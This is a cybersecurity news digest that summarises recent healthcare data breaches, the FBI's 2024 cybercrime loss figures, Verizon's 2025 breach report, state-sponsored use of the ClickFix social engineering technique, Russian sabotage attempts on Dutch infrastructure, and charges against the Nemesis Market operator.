At a glance.
- Healthcare data breaches affect millions.
- Victims lost $16.6 billion to cybercrime in 2024.
- Verizon's DBIR finds that third-party breaches have doubled.
- State-sponsored groups adopt ClickFix technique for malware delivery.
- Russian state-backed hackers target Dutch critical infrastructure.
Healthcare data breaches affect millions.
Blue Shield of California has disclosed a data breach after it mistakenly exposed health information of 4.7 million people to Google's analytics and advertisement platforms, the Register reports. The health insurance provider said the breach was caused by a misconfiguration of Google Analytics on some of its websites. Blue Shield stated, "On February 11, 2025, Blue Shield discovered that, between April 2021 and January 2024, Google Analytics was configured in a way that allowed certain member data to be shared with Google’s advertising product, Google Ads, that likely included protected health information. Google may have used this data to conduct focused ad campaigns back to those individual members. We want to reassure our members that no bad actor was involved, and, to our knowledge, Google has not used the information for any purpose other than these ads or shared the protected information with anyone."
The Yale New Haven Health System (YNHHS) in Connecticut has disclosed a data breach it sustained last month that impacted 5.5 million patients, SecurityWeek reports. YNHHS hasn't disclosed the nature of the attack, but said an "unauthorized third-party gained access to our network" and obtained copies of data. The health system stated, "The information involved varies by patient, but may include demographic information (such as name, date of birth, address, telephone number, email address, race or ethnicity), Social Security number, patient type, and/or medical record number. YNHHS’ electronic medical record system was not involved nor accessed in this incident, and no financial accounts, payment information, or employee HR information was included."
BleepingComputer reports that a ransomware-related data breach at Frederick Health Medical Group in Maryland affected information belonging to nearly one million patients. Frederick Health said in a breach notification last month that the stolen information "varied by individual but may have contained patient names, addresses, dates of birth, Social Security numbers, drivers’ license numbers, medical record numbers, health insurance information, and/or clinical information related to patients’ care." BleepingComputer notes that no ransomware group has claimed credit or posted data from this attack, suggesting Frederick Health may have paid the ransom.
The Record has a roundup of additional healthcare-related breaches disclosed over the past week, including notifications from Onsite Mammography, Kelly & Associates Insurance Group, Behavioral Health Resources, Hamilton Health Care System, Central Texas Pediatric Orthopedics, and Medical Express Ambulance Service.
Victims lost $16.6 billion to cybercrime in 2024.
The US FBI's Internet Crime Complaint Center (IC3) has released its annual report for 2024, finding that reported losses to cybercrime last year reached a record $16.6 billion. The most costly attacks were investment scams, causing $6.5 billion in losses, followed by business email compromise (BEC) at $2.7 billion and tech support scams at $1.4 billion.
The FBI received more than 4,800 complaints from critical infrastructure entities last year, most of which involved ransomware and/or data breaches. These reports rose by 9 percent compared to 2023.
Verizon's DBIR finds that third-party breaches have doubled.
Verizon has released its 2025 Data Breach Investigations Report (DBIR), finding that the percentage of breaches involving a third party has doubled to 30% compared to last year's report. Most of these incidents involved system intrusion, which Verizon says "encapsulates all the breaches and incidents that leverage a diversity of techniques, predominantly hacking techniques and malware, with a dash of social engineering."
Additionally, exploitation of vulnerabilities for initial access grew by 34% and now accounts for 20% of breaches. The researchers say this increase was partly driven by exploitation of zero-days affecting edge devices and VPNs, noting, "The percentage of edge devices and VPNs as a target on our exploitation of vulnerabilities action was 22%, and it grew almost eight-fold from the 3% found in last year’s report."
The presence of ransomware also increased by 37%, despite a decrease in the median ransom payout from $150,000 to $115,000.
State-sponsored groups adopt ClickFix technique for malware delivery.
Proofpoint says state-sponsored actors from North Korea, Iran, and Russia have adopted the ClickFix social engineering tactic to deliver malware. ClickFix involves tricking a user into copying and pasting a malicious command into a terminal on their machine. Proofpoint notes, "This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution. Primarily observed in cybercrime activity, the ClickFix technique was first seen in early March 2024 deployed by initial access broker TA571 and the ClearFake cluster, after which it flooded the threat landscape."
The researchers observed the technique used in espionage campaigns by North Korea's Kimsuky, Iran's MuddyWater, and the Russian threat actors APT28 and UNK_RemoteRogue.
Russian state-backed hackers target Dutch critical infrastructure.
The Dutch Military Intelligence and Security Service (MIVD) warns that Russian state-sponsored threat actors have begun targeting critical infrastructure in the Netherlands, the Record reports. The MIVD says Russian hackers attempted to sabotage the "digital operating system of a public facility in the Netherlands" last year. Although the incident did not cause any damage, the MIVD notes that this was "the first time that a group like this has carried out a cyber sabotage attack against such a control system in the Netherlands."
Crime and punishment.
The US Justice Department has charged an Iranian national, Behrouz Parsarad, for his alleged role as founder and operator of the popular darknet souk Nemesis Market. The Nemesis Market, which was shuttered by German police last year, had more than 150,000 users and processed more than 400,000 orders for illegal drugs. The marketplace also served various cybercriminal goods, including "stolen financial information, fraudulent identification documents, counterfeit currencies, and computer malware."
The US Treasury Department said last month that Nemesis facilitated the sale of nearly $30 million worth of drugs during its three years of operation, with Parsarad taking a five percent cut of each sale.
